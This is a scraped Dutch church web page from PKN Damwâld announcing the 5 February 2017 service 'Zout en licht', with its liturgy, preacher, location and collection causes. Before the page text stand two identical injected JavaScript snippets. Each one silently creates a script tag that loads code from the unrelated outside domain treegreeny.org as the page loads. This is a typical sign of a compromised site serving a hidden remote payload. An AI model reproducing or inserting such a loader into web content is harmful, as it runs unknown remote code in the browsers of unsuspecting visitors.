;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 5 februari 2017 9:30 uur - PKN Damwâld
zondag 5 februari 2017
09:30 uur

Kerkdienst zondag 5 februari 2017 9:30 uur

Thema: Zout en licht

Informatie

Voorganger:Ds. G. Timmer
Organist:Foeke Wiegersma
Thema:Zout en licht
Liturgie
Lied voor de dienst ELB 181: 1 en 4
Welkom en mededelingen
Intochtslied Gezang 314: 1, 2, 3 en 4
Stil gebed, bemoediging en groet
We zingen: Psalm 146: 3, 4 en 5
Wetlezing
We zingen: ELB 382: 1, 2, 3 + refrein
Gebed
We lezen: Mattheus 5: 1-16
We zingen: Psalm 67: 1 en 2
Verkondiging : Zout en licht
We zingen: Gezang 481: 1 en 2
Dankgebed en voorbeden
Collecte
Slotlied ELB 390: 1, 2, 3, 4 en 5
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting De Ontmoeting

Vastgelopen mensen worden door Ontmoeting ondersteund om hun leven weer op orde te krijgen. Ontmoeting leert hen om weer op eigen benen te staan, relaties aan te gaan en te onderhouden en de juiste keuzes te maken. Zo krijgen ze weer perspectief in hun leven.
Dankzij de vrijwilligers en medewerkers van Ontmoeting kunnen zij deze missie uitvoeren. Zij zetten zich met hart en ziel in voor hun medemens. Door een luisterend oor of praktische begeleiding te bieden. Of door ondersteunende taken te verrichten.

Tweede collecte: Kerk
Uitganscollecte: Werelddiaconaat

Boeren verdienen meer met biologische nootmuskaat.
In de 18e eeuw was noodmuskaat het zwarte goud voor de Indonesische provincie Noord-Molukken. Tegenwoordig is de prijs van specerij laag. Toch is er wereldwijd een grote vraag naar noodmuskaat van goede kwaliteit. Daarom traint partnerorganisatie IDH boeren om noodmuskaat op biologische wijze te verbouwen en deze te verwerken volgens internationale kwaliteitsnormen. IDH helpt boeren ook zich in coöperaties te organiseren om hun noodmuskaat gezamenlijk te exporteren. Door de verbeterde kwaliteit en de verkoop via coöperaties levert de noodmuskaat meer op. De ambitie is dat 5.000 boeren dankzij dit project voor eind 2017 een hoger inkomen hebben.